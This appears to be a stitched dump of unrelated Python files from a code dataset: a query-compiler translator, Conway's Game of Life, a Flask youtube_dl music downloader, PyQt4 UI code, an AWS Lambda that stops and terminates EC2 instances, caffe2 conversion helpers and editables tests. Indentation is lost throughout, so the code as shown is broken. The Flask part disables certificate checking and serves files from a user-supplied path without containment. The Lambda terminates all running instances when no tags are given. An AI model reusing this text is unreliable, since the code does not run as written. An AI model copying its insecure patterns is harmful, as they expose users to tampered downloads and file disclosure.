for name in ("curr_state", "next_state", "rewards", "terminals", "actions"):
setattr(self, name, np.load(os.path.join(path, "%s.npy" % name)))
def size(self):
for name in ("curr_state", "next_state", "rewards", "terminals", "actions"):
print("%s size is %s" % (name, getattr(self, name).shape))
|
StarcoderdataPython
|
73494
|
from ..ops import *
class Translator(object):
"""
A translator wraps a physical operator and provides the compilation logic.
It follows the producer/consumer model.
It also contains information about the lineage it needs to capture.
"""
_id = 0
def __init__(self, op):
self.id = Translator._id
Translator._id += 1
self.op = op
self.child_translator = None
self.parent_translator = None
self.l_materialize = False
self.l_capture = False
self.l_prev_translator = None # previous translator that contains lindexes
self.lindex = None
self.lindexes = []
@property
def propagated_lindexes(self):
"""
Join
/ \
Join C
| |
A B
"""
return self.lindexes
def prepare(self, c, p, pipeline):
self.child_translator = c
self.parent_translator = p
self.pipeline = pipeline
def is_type(self, klasses):
if not isinstance(klasses, list):
klasses = [klasses]
return any(isinstance(self, k) for k in klasses)
def produce(self, ctx):
pass
def consume(self, ctx):
pass
def compile_expr(self, ctx, e):
"""
@return var name containing expression result
"""
raise Exception("Not implemented")
def compile_exprs(self, ctx, exprs):
"""
@return [varname,] list of expression results
"""
raise Exception("Not implemented")
def compile_new_tuple(self, ctx, schema):
"""
@return varname containing the new tuple
"""
raise Exception("Not implemented")
def clean_prev_lineage_indexes(self):
"""
Clean up (delete) previous lineage indexes,
if they are not materialized
"""
if self.l_capture and self.l_prev_translator:
self.l_prev_translator.clean_lineage_indexes()
def clean_lineage_indexes(self):
if self.l_capture and not self.l_materialize:
for lindex in self.propagated_lindexes:
lindex.clean_lineage_indexes()
self.lindex = None
self.lindexes = []
if hasattr(self, "left") and self.left:
self.left.lindex = None
self.left.lindexes = []
def pretty_print(self):
return self.op.pretty_print()
def __str__(self):
return "%s: %s" % (self.id, self.__class__.__name__)
class BottomTranslator(Translator):
"""
Unary operators that are pipeline breakers (groupby, orderby)
are split into bottom and top translators.
Bottom is responsible for buffering tuples in an appropriate data structure
(hashtable for groupby, list for orderby)
"""
def __init__(self, op):
super(BottomTranslator, self).__init__(op)
self.l_i = None
class TopTranslator(Translator):
"""
    Top is responsible for processing and walking the populated data structure
    from Bottom and generating output tuples for its parent translators
"""
def __init__(self, op, bottom):
super(TopTranslator, self).__init__(op)
self.bottom = bottom
self.l_i = None # source rid
self.l_o = None # output rid
def initialize_lineage_indexes(self, ctx):
pass
def populate_lineage_indexes(self, ctx, v_bucket):
pass
class LeftTranslator(Translator):
"""
Binary join operators are split into a left and right side.
For hash joins, the left translator is a pipeline breaker that
collects tuples in a hash table.
For theta joins, the left is just a loop
"""
def __init__(self, op):
super(LeftTranslator, self).__init__(op)
self.l_i = None
class RightTranslator(Translator):
"""
Iterates over the right side of the join and probes the left side.
"""
def __init__(self, op, left):
super(RightTranslator, self).__init__(op)
self.left = left
assert(op.is_type(Join))
self.l_i = None
self.l_o = None
@property
def propagated_lindexes(self):
ret = []
ret.extend(self.left.propagated_lindexes)
ret.extend(self.lindexes)
return ret
|
StarcoderdataPython
|
199596
|
# Conway's game of life
# uses pygamezero frame work
#
# See key event at end for commands
#
import random
ROWS = 50
COLS = 70
CELL_SIZE = 10
HEIGHT = (ROWS * CELL_SIZE)
WIDTH = (COLS * CELL_SIZE)
BACK_COLOR = (0, 0, 127)
CELL_COLOR = (0, 200, 0)
g_changed = False
g_running = True
g_step = False
def grid_build(rows, cols):
return [[False for c in range(cols)] for r in range(rows)]
def apply(grid, func):
for r in range(len(grid)):
for c in range(len(grid[r])):
grid[r][c] = func(r, c)
def grid_random(grid):
apply(grid, lambda r, c : (random.randint(0, 7) == 0))
def grid_clear(grid):
    apply(grid, lambda r, c: False)
def cell_draw(r, c):
cx = CELL_SIZE * c
cy = CELL_SIZE * r
cell_rect = Rect((cx, cy), (CELL_SIZE, CELL_SIZE))
screen.draw.filled_rect(cell_rect, CELL_COLOR)
return True
def draw():
global g_changed
if not g_changed:
return
g_changed = False
screen.fill(BACK_COLOR)
apply(world, lambda r, c : (cell_draw(r, c) if world[r][c] else False))
def count_neighbors(w, r, c):
    # count the 3x3 grid, subtract the middle
# trims off the edges if next to the edge of the world
sum = -1 if w[r][c] else 0
for nr in range(max(r-1, 0), min(r+1, ROWS-1) + 1):
for nc in range(max(c-1, 0), min(c+1, COLS-1) + 1):
if w[nr][nc]:
sum += 1
    # The center cell was already subtracted out above, so sum holds only the live neighbors.
return sum
def next_cell(current_world, r, c):
n = count_neighbors(current_world, r, c)
if current_world[r][c]:
# Live cell stays alive if not lonely or crowded
return (n >= 2 and n <= 3)
else:
# Open cell springs to life if three nearby
return (n == 3)
def update():
# Look at globals that control the speed
global g_running, g_changed, g_step
if not g_running:
return
if g_step:
g_running = False
g_changed = True
# Calculate the next state, then copy back
apply(worldNext, lambda r, c : next_cell(world, r, c))
apply(world, lambda r, c : worldNext[r][c])
def on_mouse_down(pos, button):
global g_changed
r = pos[1] // CELL_SIZE
c = pos[0] // CELL_SIZE
world[r][c] = not world[r][c]
g_changed = True
def on_key_down(key, mod, unicode):
global g_running, g_step, g_changed
if (key == keys.SPACE):
# Freeze / thaw the clock of life
g_running = not g_running
g_step = False
if (key == keys.C):
# Clear the world
grid_clear(world)
g_changed = True
if (key == keys.R):
        # Seed world with random values
grid_random(world)
g_changed = True
if (key == keys.S):
        # Make a single generation step
g_running = True
g_step = True
world = grid_build(ROWS, COLS)
grid_random(world)
worldNext = grid_build(ROWS, COLS)
|
StarcoderdataPython
|
3311049
|
#!/usr/bin/python3
# music_blueprint.py
import os
import sys
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
import youtube_dl
from auth import authenticate
from errors_blueprint import *
from config import MUSIC_LOCATION
from flask import Blueprint, render_template, safe_join, request, redirect, send_from_directory
music_blueprint = Blueprint('music_blueprint', __name__, template_folder=os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), 'templates'), static_folder=os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), 'static'))
def get_youtube_music(url, directory):
youtube_dl_options = {
'format': 'bestaudio/best',
'postprocessors': [{
'key': 'FFmpegExtractAudio',
'preferredcodec': 'mp3'
}],
'nocheckcertificate': True,
'outtmpl': os.path.join(directory, '%(title)s.%(ext)s')
}
try:
with youtube_dl.YoutubeDL(youtube_dl_options) as ydl:
ydl.download([url])
return True
except:
return False
@music_blueprint.route('/music/', methods=['GET'])
@authenticate
def get_music():
music = []
for root, dirs, files in os.walk(MUSIC_LOCATION):
music += [{'path': safe_join('/music', 'src', root.split(MUSIC_LOCATION)[-1], file), 'name': os.path.basename(os.path.splitext(file)[0])} for file in files if file.endswith('.mp3')]
return render_template('music/music.html', music=sorted(music, key=lambda k: k['name'])), 200
@music_blueprint.route('/music/', methods=['POST'])
@authenticate
def post_music():
if request.form.get('url'):
get_youtube_music(request.form.get('url'), os.path.join(MUSIC_LOCATION, 'download'))
return redirect('/music/'), 302
@music_blueprint.route('/music/src/<path:path>', methods=['GET'])
@authenticate
def get_music_source(path):
local_path = os.path.join(MUSIC_LOCATION, path)
if os.path.isfile(local_path):
directory, filename = os.path.split(local_path)
return send_from_directory(directory, filename)
return error_404(404)
|
StarcoderdataPython
|
176715
|
<reponame>specialforcea/labscript_suite
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'chipfpga.ui'
#
# Created by: PyQt4 UI code generator 4.11.4
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore, QtGui
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
def _fromUtf8(s):
return s
try:
_encoding = QtGui.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtGui.QApplication.translate(context, text, disambig)
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName(_fromUtf8("Form"))
Form.resize(663, 635)
Form.setMaximumSize(QtCore.QSize(15777191, 16777215))
self.gridLayout = QtGui.QGridLayout(Form)
self.gridLayout.setObjectName(_fromUtf8("gridLayout"))
self.scrollArea = QtGui.QScrollArea(Form)
self.scrollArea.setWidgetResizable(True)
self.scrollArea.setObjectName(_fromUtf8("scrollArea"))
self.scrollAreaWidgetContents_2 = QtGui.QWidget()
self.scrollAreaWidgetContents_2.setGeometry(QtCore.QRect(0, 0, 643, 310))
self.scrollAreaWidgetContents_2.setObjectName(_fromUtf8("scrollAreaWidgetContents_2"))
self.gridLayout_6 = QtGui.QGridLayout(self.scrollAreaWidgetContents_2)
self.gridLayout_6.setObjectName(_fromUtf8("gridLayout_6"))
self.tab = QtGui.QTabWidget(self.scrollAreaWidgetContents_2)
self.tab.setObjectName(_fromUtf8("tab"))
self.load_tab = QtGui.QWidget()
self.load_tab.setObjectName(_fromUtf8("load_tab"))
self.gridLayout_3 = QtGui.QGridLayout(self.load_tab)
self.gridLayout_3.setObjectName(_fromUtf8("gridLayout_3"))
self.load_table = QtGui.QTableWidget(self.load_tab)
self.load_table.setObjectName(_fromUtf8("load_table"))
self.load_table.setColumnCount(0)
self.load_table.setRowCount(0)
self.gridLayout_3.addWidget(self.load_table, 0, 0, 1, 1)
self.tab.addTab(self.load_tab, _fromUtf8(""))
self.read_table_tab = QtGui.QWidget()
self.read_table_tab.setObjectName(_fromUtf8("read_table_tab"))
self.gridLayout_2 = QtGui.QGridLayout(self.read_table_tab)
self.gridLayout_2.setObjectName(_fromUtf8("gridLayout_2"))
self.read_table = QtGui.QTableWidget(self.read_table_tab)
self.read_table.setObjectName(_fromUtf8("read_table"))
self.read_table.setColumnCount(0)
self.read_table.setRowCount(0)
self.gridLayout_2.addWidget(self.read_table, 0, 0, 1, 1)
self.tab.addTab(self.read_table_tab, _fromUtf8(""))
self.read_graph_tab = QtGui.QWidget()
self.read_graph_tab.setObjectName(_fromUtf8("read_graph_tab"))
self.verticalLayout = QtGui.QVBoxLayout(self.read_graph_tab)
self.verticalLayout.setObjectName(_fromUtf8("verticalLayout"))
self.read_graph = QtGui.QGraphicsView(self.read_graph_tab)
self.read_graph.setObjectName(_fromUtf8("read_graph"))
self.verticalLayout.addWidget(self.read_graph)
self.tab.addTab(self.read_graph_tab, _fromUtf8(""))
self.gridLayout_6.addWidget(self.tab, 0, 0, 1, 1)
self.scrollArea.setWidget(self.scrollAreaWidgetContents_2)
self.gridLayout.addWidget(self.scrollArea, 0, 1, 1, 1)
self.scrollArea_2 = QtGui.QScrollArea(Form)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.scrollArea_2.sizePolicy().hasHeightForWidth())
self.scrollArea_2.setSizePolicy(sizePolicy)
self.scrollArea_2.setWidgetResizable(True)
self.scrollArea_2.setObjectName(_fromUtf8("scrollArea_2"))
self.scrollAreaWidgetContents = QtGui.QWidget()
self.scrollAreaWidgetContents.setGeometry(QtCore.QRect(0, 0, 643, 297))
self.scrollAreaWidgetContents.setObjectName(_fromUtf8("scrollAreaWidgetContents"))
self.gridLayout_7 = QtGui.QGridLayout(self.scrollAreaWidgetContents)
self.gridLayout_7.setObjectName(_fromUtf8("gridLayout_7"))
self.file_dir_Edit = QtGui.QLineEdit(self.scrollAreaWidgetContents)
self.file_dir_Edit.setObjectName(_fromUtf8("file_dir_Edit"))
self.gridLayout_7.addWidget(self.file_dir_Edit, 1, 1, 1, 1)
self.read_status_edit = QtGui.QLineEdit(self.scrollAreaWidgetContents)
self.read_status_edit.setObjectName(_fromUtf8("read_status_edit"))
self.gridLayout_7.addWidget(self.read_status_edit, 3, 1, 1, 1)
self.byte_to_read_edit = QtGui.QLineEdit(self.scrollAreaWidgetContents)
self.byte_to_read_edit.setObjectName(_fromUtf8("byte_to_read_edit"))
self.gridLayout_7.addWidget(self.byte_to_read_edit, 5, 1, 1, 1)
self.Load_Button = QtGui.QPushButton(self.scrollAreaWidgetContents)
self.Load_Button.setObjectName(_fromUtf8("Load_Button"))
self.gridLayout_7.addWidget(self.Load_Button, 1, 0, 1, 1)
self.Write_Button = QtGui.QPushButton(self.scrollAreaWidgetContents)
self.Write_Button.setObjectName(_fromUtf8("Write_Button"))
self.gridLayout_7.addWidget(self.Write_Button, 3, 0, 1, 1)
self.write_status_edit = QtGui.QLineEdit(self.scrollAreaWidgetContents)
self.write_status_edit.setObjectName(_fromUtf8("write_status_edit"))
self.gridLayout_7.addWidget(self.write_status_edit, 5, 2, 1, 1)
self.Read_button = QtGui.QPushButton(self.scrollAreaWidgetContents)
self.Read_button.setObjectName(_fromUtf8("Read_button"))
self.gridLayout_7.addWidget(self.Read_button, 5, 0, 1, 1)
self.correct_button = QtGui.QPushButton(self.scrollAreaWidgetContents)
self.correct_button.setObjectName(_fromUtf8("correct_button"))
self.gridLayout_7.addWidget(self.correct_button, 7, 0, 1, 1)
self.correct_byte_edit = QtGui.QLineEdit(self.scrollAreaWidgetContents)
self.correct_byte_edit.setObjectName(_fromUtf8("correct_byte_edit"))
self.gridLayout_7.addWidget(self.correct_byte_edit, 7, 1, 1, 1)
self.write_status = QtGui.QLabel(self.scrollAreaWidgetContents)
self.write_status.setObjectName(_fromUtf8("write_status"))
self.gridLayout_7.addWidget(self.write_status, 2, 1, 1, 1, QtCore.Qt.AlignBottom)
self.read_status = QtGui.QLabel(self.scrollAreaWidgetContents)
self.read_status.setObjectName(_fromUtf8("read_status"))
self.gridLayout_7.addWidget(self.read_status, 4, 2, 1, 1, QtCore.Qt.AlignBottom)
self.table_dir = QtGui.QLabel(self.scrollAreaWidgetContents)
self.table_dir.setMaximumSize(QtCore.QSize(308, 48))
self.table_dir.setObjectName(_fromUtf8("table_dir"))
self.gridLayout_7.addWidget(self.table_dir, 0, 1, 1, 1, QtCore.Qt.AlignBottom)
self.correct_value_edit = QtGui.QLineEdit(self.scrollAreaWidgetContents)
self.correct_value_edit.setObjectName(_fromUtf8("correct_value_edit"))
self.gridLayout_7.addWidget(self.correct_value_edit, 7, 2, 1, 1)
self.bytes_to_read = QtGui.QLabel(self.scrollAreaWidgetContents)
self.bytes_to_read.setObjectName(_fromUtf8("bytes_to_read"))
self.gridLayout_7.addWidget(self.bytes_to_read, 4, 1, 1, 1, QtCore.Qt.AlignBottom)
self.correct_byte = QtGui.QLabel(self.scrollAreaWidgetContents)
self.correct_byte.setObjectName(_fromUtf8("correct_byte"))
self.gridLayout_7.addWidget(self.correct_byte, 6, 1, 1, 1, QtCore.Qt.AlignBottom)
self.corret_value = QtGui.QLabel(self.scrollAreaWidgetContents)
self.corret_value.setObjectName(_fromUtf8("corret_value"))
self.gridLayout_7.addWidget(self.corret_value, 6, 2, 1, 1, QtCore.Qt.AlignBottom)
self.Load_Button.raise_()
self.Load_Button.raise_()
self.Write_Button.raise_()
self.Read_button.raise_()
self.byte_to_read_edit.raise_()
self.read_status_edit.raise_()
self.file_dir_Edit.raise_()
self.correct_button.raise_()
self.correct_byte_edit.raise_()
self.correct_value_edit.raise_()
self.write_status_edit.raise_()
self.table_dir.raise_()
self.write_status.raise_()
self.read_status.raise_()
self.bytes_to_read.raise_()
self.correct_byte.raise_()
self.corret_value.raise_()
self.scrollArea_2.setWidget(self.scrollAreaWidgetContents)
self.gridLayout.addWidget(self.scrollArea_2, 1, 1, 1, 1)
self.retranslateUi(Form)
self.tab.setCurrentIndex(0)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
Form.setWindowTitle(_translate("Form", "Form", None))
self.tab.setTabText(self.tab.indexOf(self.load_tab), _translate("Form", "Loaded table", None))
self.tab.setTabText(self.tab.indexOf(self.read_table_tab), _translate("Form", "Read table", None))
self.tab.setTabText(self.tab.indexOf(self.read_graph_tab), _translate("Form", "Read graph", None))
self.Load_Button.setText(_translate("Form", "Load", None))
self.Write_Button.setText(_translate("Form", "Write", None))
self.Read_button.setText(_translate("Form", "Read", None))
self.correct_button.setText(_translate("Form", "Correct", None))
self.write_status.setText(_translate("Form", "Write status", None))
self.read_status.setText(_translate("Form", "Read status", None))
self.table_dir.setText(_translate("Form", "Table file directory", None))
self.bytes_to_read.setText(_translate("Form", "bytes to read", None))
self.correct_byte.setText(_translate("Form", "correct byte", None))
self.corret_value.setText(_translate("Form", "correct_value", None))
|
StarcoderdataPython
|
1653285
|
import json
import boto3
from time import sleep
from itertools import chain
client = boto3.client('ec2')
def list_instances(tags=None):
if tags is not None:
response = client.describe_instances(
Filters=[
{
'Name': 'tag:SubSystem',
'Values': tags
},
]
)
else:
response = client.describe_instances()
instance_list = list(
chain.from_iterable(
map(
lambda items: items['Instances'],
response['Reservations']
)
)
)
instances = list(
map(
lambda instance: instance['InstanceId'],
filter(
                lambda instance: instance['State']['Name'] == 'pending' or instance['State']['Name'] == 'running',
instance_list
)
)
)
return instances
def stop_instances(instanceIds, sleep_in_sec=10):
stopping_instances = list(
map(
lambda instance: instance['InstanceId'],
client.stop_instances(
InstanceIds=instanceIds
)['StoppingInstances']
)
)
sleep(sleep_in_sec)
counter = 0
    while counter < 6 and len(stopping_instances) > 0:
response = client.describe_instances(
InstanceIds=stopping_instances
)
        stopping_instances = list(
map(
lambda instance: instance['InstanceId'],
filter(
lambda instance: instance['State']['Name'] == 'pending' or instance['State']['Name'] == 'running' or instance['State']['Name'] == 'shutting-down',
chain.from_iterable(
map(
lambda items: items['Instances'],
response['Reservations']
)
)
)
)
)
        counter += 1
        if len(stopping_instances) > 0 and counter >= 3:
            raise Exception('Maximum number of retries exceeded')
def terminate_instances(instances, sleep_in_sec=10):
terminating_instances = list(
map(
lambda instance: instance['InstanceId'],
client.terminate_instances(InstanceIds=instances)['TerminatingInstances']
)
)
sleep(sleep_in_sec)
counter = 0
    while counter < 6 and len(terminating_instances) > 0:
response = client.describe_instances(
InstanceIds=terminating_instances
)
terminating_instances = list(
map(
lambda instance: instance['InstanceId'],
filter(
lambda instance: instance['State']['Name'] != 'terminated',
chain.from_iterable(
map(
lambda items: items['Instances'],
response['Reservations']
)
)
)
)
)
        counter += 1
        if len(terminating_instances) > 0 and counter >= 3:
            raise Exception('Maximum number of retries exceeded')
def sendResponse(success , statusCode , message , responseData):
return {
'success' : success,
'statusCode' : statusCode,
'message': message,
'responseData' : responseData
}
def handler(event, context):
try:
print('event: {0}'.format(json.dumps(event)))
# print('context: {0}'.format(json.dumps(context)))
if event['tags'] is not None:
tags = event['tags']
else:
tags = None
instances = list_instances(tags)
if len(instances) > 0:
stop_instances(instanceIds=instances)
print('Stopped instances')
terminate_instances(instances=instances)
print('Terminated instances')
        return sendResponse(True, 200, 'Instance cleanup completed', '')
except Exception as error:
        return sendResponse(False, 500, 'Error stopping or terminating instances', str(error))
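# Illustrative invocation (the SubSystem tag value below is a hypothetical example):
#   handler({'tags': ['my-subsystem']}, None)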
|
StarcoderdataPython
|
1737011
|
# Copyright (c) 2017-present, Facebook, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
'''Helper functions for model conversion to pb'''
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from functools import wraps
import copy
import numpy as np
from caffe2.python import core, workspace
from caffe2.proto import caffe2_pb2
class OpFilter(object):
def __init__(self, **kwargs):
self.type = None
self.type_in = None
self.inputs = None
self.outputs = None
self.input_has = None
self.output_has = None
self.cond = None
self.reverse = False
assert all([x in self.__dict__ for x in kwargs])
self.__dict__.update(kwargs)
def check(self, op):
ret = self.reverse
if self.type and op.type != self.type:
return ret
if self.type_in and op.type not in self.type_in:
return ret
if self.inputs and set(op.input) != set(self.inputs):
return ret
if self.outputs and set(op.output) != set(self.outputs):
return ret
if self.input_has and self.input_has not in op.input:
return ret
if self.output_has and self.output_has not in op.output:
return ret
if self.cond is not None and not self.cond:
return ret
return not ret
def filter_op(op, **kwargs):
''' Returns true if passed all checks '''
return OpFilter(**kwargs).check(op)
def op_filter(**filter_args):
''' Returns None if no condition is satisfied '''
def actual_decorator(f):
@wraps(f)
def wrapper(op, **params):
if not filter_op(op, **filter_args):
return None
return f(op, **params)
return wrapper
return actual_decorator
def op_func_chain(convert_func_list):
''' Run funcs one by one until func return is not None '''
assert isinstance(convert_func_list, list)
def _chain(op):
for x in convert_func_list:
ret = x(op)
if ret is not None:
return ret
return None
return _chain
def convert_op_in_ops(ops_ref, func_or_list):
func = func_or_list
if isinstance(func_or_list, list):
func = op_func_chain(func_or_list)
ops = [op for op in ops_ref]
converted_ops = []
for op in ops:
new_ops = func(op)
if new_ops is not None and not isinstance(new_ops, list):
new_ops = [new_ops]
converted_ops.extend(new_ops if new_ops is not None else [op])
del ops_ref[:]
# ops_ref maybe of type RepeatedCompositeFieldContainer
# which does not have append()
ops_ref.extend(converted_ops)
def convert_op_in_proto(proto, func_or_list):
convert_op_in_ops(proto.op, func_or_list)
def get_op_arg(op, arg_name):
for x in op.arg:
if x.name == arg_name:
return x
return None
def get_op_arg_valf(op, arg_name, default_val):
arg = get_op_arg(op, arg_name)
return arg.f if arg is not None else default_val
def update_mobile_engines(net):
for op in net.op:
if op.type == "Conv":
op.engine = "NNPACK"
if op.type == "ConvTranspose":
op.engine = "BLOCK"
def pairwise(iterable):
"s -> (s0,s1), (s1,s2), (s2, s3), ..."
from itertools import tee
a, b = tee(iterable)
next(b, None)
return zip(a, b)
def blob_uses(net, blob):
u = []
for i, op in enumerate(net.op):
if blob in op.input or blob in op.control_input:
u.append(i)
return u
def fuse_first_affine(net, params, removed_tensors):
net = copy.deepcopy(net)
params = copy.deepcopy(params)
for ((i, current), (j, next_)) in pairwise(enumerate(net.op)):
if next_.input[0] != current.output[0]:
continue
if current.type not in ("Conv", "ConvTranspose") \
or next_.type != "AffineChannel":
continue
if current.output[0] != next_.output[0] and \
len(blob_uses(net, current.output[0])) != 1:
# Can't fuse if more than one user unless AffineChannel is inplace
continue
# else, can fuse
conv = current
affine = next_
fused_conv = copy.deepcopy(conv)
fused_conv.output[0] = affine.output[0]
conv_weight = params[conv.input[1]]
conv_has_bias = len(conv.input) > 2
conv_bias = params[conv.input[2]] if conv_has_bias else 0
A = params[affine.input[1]]
B = params[affine.input[2]]
# Thus, can just have the affine transform
# X * A + B
# where
# A = bn_scale * 1.0 / (sqrt(running_var + eps))
# B = (bias - running_mean * (1.0 / sqrt(running_var + eps))
# * bn_scale)
# This identify should hold if we have correctly fused
# np.testing.assert_array_equal(
# params[conv.output[0]] * A + B,
# params[bn.output[0]])
# Now, we have that the computation made is the following:
# ((X `conv` W) + b) * A + B
# Then, we can simply fuse this as follows:
# (X `conv` (W * A)) + b * A + B
# which is simply
# (X `conv` Q) + C
# where
# Q = W * A
# C = b * A + B
# For ConvTranspose, from the view of convolutions as a
# Toepeliz multiplication, we have W_ = W^T, so the weights
# are laid out as (R, S, K, K) (vs (S, R, K, K) for a Conv),
# so the weights broadcast slightly differently. Remember, our
# BN scale 'B' is of size (S,)
A_ = A.reshape(-1, 1, 1, 1) if conv.type == "Conv" else \
A.reshape(1, -1, 1, 1)
C = conv_bias * A + B
Q = conv_weight * A_
assert params[conv.input[1]].shape == Q.shape
params[conv.input[1]] = Q
if conv_has_bias:
assert params[conv.input[2]].shape == C.shape
params[conv.input[2]] = C
else:
# make af_bias to be bias of the conv layer
fused_conv.input.append(affine.input[2])
params[affine.input[2]] = B
new_ops = net.op[:i] + [fused_conv] + net.op[j + 1:]
del net.op[:]
if conv_has_bias:
del params[affine.input[2]]
removed_tensors.append(affine.input[2])
removed_tensors.append(affine.input[1])
del params[affine.input[1]]
net.op.extend(new_ops)
break
return net, params, removed_tensors
def fuse_affine(net, params, ignore_failure):
# Run until we hit a fixed point
removed_tensors = []
while True:
(next_net, next_params, removed_tensors) = \
fuse_first_affine(net, params, removed_tensors)
if len(next_net.op) == len(net.op):
if (
any(op.type == "AffineChannel" for op in next_net.op) and
not ignore_failure
):
raise Exception(
"Model contains AffineChannel op after fusion: %s", next_net)
return (next_net, next_params, removed_tensors)
net, params, removed_tensors = (next_net, next_params, removed_tensors)
def fuse_net(fuse_func, net, blobs, ignore_failure=False):
is_core_net = isinstance(net, core.Net)
if is_core_net:
net = net.Proto()
net, params, removed_tensors = fuse_func(net, blobs, ignore_failure)
for rt in removed_tensors:
net.external_input.remove(rt)
if is_core_net:
net = core.Net(net)
return net, params
def fuse_net_affine(net, blobs):
return fuse_net(fuse_affine, net, blobs)
def add_tensor(net, name, blob):
''' Create an operator to store the tensor 'blob',
run the operator to put the blob to workspace.
uint8 is stored as an array of string with one element.
'''
kTypeNameMapper = {
np.dtype('float32'): "GivenTensorFill",
np.dtype('int32'): "GivenTensorIntFill",
np.dtype('int64'): "GivenTensorInt64Fill",
np.dtype('uint8'): "GivenTensorStringFill",
}
shape = blob.shape
values = blob
# pass array of uint8 as a string to save storage
# storing uint8_t has a large overhead for now
if blob.dtype == np.dtype('uint8'):
shape = [1]
values = [str(blob.data)]
op = core.CreateOperator(
kTypeNameMapper[blob.dtype],
[], [name],
shape=shape,
values=values,
# arg=[
# putils.MakeArgument("shape", shape),
# putils.MakeArgument("values", values),
# ]
)
net.op.extend([op])
def gen_init_net_from_blobs(blobs, blobs_to_use=None, excluded_blobs=None):
''' Generate an initialization net based on a blob dict '''
ret = caffe2_pb2.NetDef()
if blobs_to_use is None:
blobs_to_use = {x for x in blobs}
else:
blobs_to_use = copy.deepcopy(blobs_to_use)
if excluded_blobs is not None:
blobs_to_use = [x for x in blobs_to_use if x not in excluded_blobs]
for name in blobs_to_use:
blob = blobs[name]
if isinstance(blob, str):
print('Blob {} with type {} is not supported in generating init net,'
' skipped.'.format(name, type(blob)))
continue
add_tensor(ret, name, blob)
return ret
def get_ws_blobs(blob_names=None):
''' Get blobs in 'blob_names' in the default workspace,
get all blobs if blob_names is None '''
blobs = {}
if blob_names is None:
blob_names = workspace.Blobs()
blobs = {x: workspace.FetchBlob(x) for x in blob_names}
return blobs
def get_device_option_cpu():
device_option = core.DeviceOption(caffe2_pb2.CPU)
return device_option
def get_device_option_cuda(gpu_id=0):
device_option = caffe2_pb2.DeviceOption()
device_option.device_type = caffe2_pb2.CUDA
device_option.device_id = gpu_id
return device_option
def create_input_blobs_for_net(net_def):
for op in net_def.op:
for blob_in in op.input:
if not workspace.HasBlob(blob_in):
workspace.CreateBlob(blob_in)
def compare_model(model1_func, model2_func, test_image, check_blobs):
''' model_func(test_image, check_blobs)
'''
cb1, cb2 = check_blobs, check_blobs
if isinstance(check_blobs, dict):
cb1 = check_blobs.keys()
cb2 = check_blobs.values()
print('Running the first model...')
res1 = model1_func(test_image, check_blobs)
print('Running the second model...')
res2 = model2_func(test_image, check_blobs)
for idx in range(len(cb1)):
print('Checking {} -> {}...'.format(cb1[idx], cb2[idx]))
n1, n2 = cb1[idx], cb2[idx]
r1 = res1[n1] if n1 in res1 else None
r2 = res2[n2] if n2 in res2 else None
assert r1 is not None or r2 is None, \
"Blob {} in model1 is None".format(n1)
assert r2 is not None or r1 is None, \
"Blob {} in model2 is None".format(n2)
assert r1.shape == r2.shape, \
"Blob {} and {} shape mismatched: {} vs {}".format(
n1, n2, r1.shape, r2.shape)
np.testing.assert_array_almost_equal(
r1, r2, decimal=3,
err_msg='{} and {} not matched. Max diff: {}'.format(
n1, n2, np.amax(np.absolute(r1 - r2))))
return True
# graph_name could not contain word 'graph'
def save_graph(net, file_name, graph_name="net", op_only=True):
from caffe2.python import net_drawer
graph = None
ops = net.op
if not op_only:
graph = net_drawer.GetPydotGraph(
ops, graph_name,
rankdir="TB")
else:
graph = net_drawer.GetPydotGraphMinimal(
ops, graph_name,
rankdir="TB", minimal_dependency=True)
try:
graph.write_png(file_name)
except Exception as e:
print('Error when writing graph to image {}'.format(e))
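# Illustrative use of the fusion helpers above (a sketch: `net` is assumed to be a
# caffe2 net and `blobs` a dict of parameter arrays, e.g. from get_ws_blobs()):
#
#   fused_net, fused_params = fuse_net_affine(net, blobs)
#   init_net = gen_init_net_from_blobs(fused_params)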
|
StarcoderdataPython
|
1674168
|
<gh_stars>0
import subprocess
import pytest
import virtualenv
from editables import build_editable
def make_venv(name):
return virtualenv.cli_run([str(name), "--without-pip"])
def run(*args):
return subprocess.run(
[str(a) for a in args],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
check=True,
universal_newlines=True,
)
def build_project(target, structure):
target.mkdir(exist_ok=True, parents=True)
for name, content in structure.items():
path = target / name
if isinstance(content, str):
path.write_text(content, encoding="utf-8")
else:
build_project(path, content)
@pytest.fixture
def project(tmp_path):
project = tmp_path / "project"
structure = {
"foo": {
"__init__.py": "print('foo')",
"bar": {"__init__.py": "print('foo.bar')"},
"baz": {"__init__.py": "print('foo.baz')"},
}
}
build_project(project, structure)
yield project
def test_returns_right_files(project):
files = [f for f, src in build_editable(project)]
assert files == ["foo.py"]
files = {f for f, src in build_editable(project / "foo")}
assert files == {"bar.py", "baz.py"}
@pytest.mark.parametrize(
"expose,hide", [(None, None), (None, ["foo.bar"]), ("foo", ["foo.bar", "foo.baz"])]
)
def test_hook_vars(project, expose, hide):
filename, src = next(build_editable(project, expose=expose, hide=hide))
# Remove the line that runs the bootstrap
src = "\n".join(line for line in src.splitlines() if line != "_bootstrap()")
global_dict = {"__builtins__": __builtins__}
exec(src, global_dict)
assert global_dict["location"] == str(project), str(src)
assert set(global_dict["excludes"]) == set(hide or []), str(src)
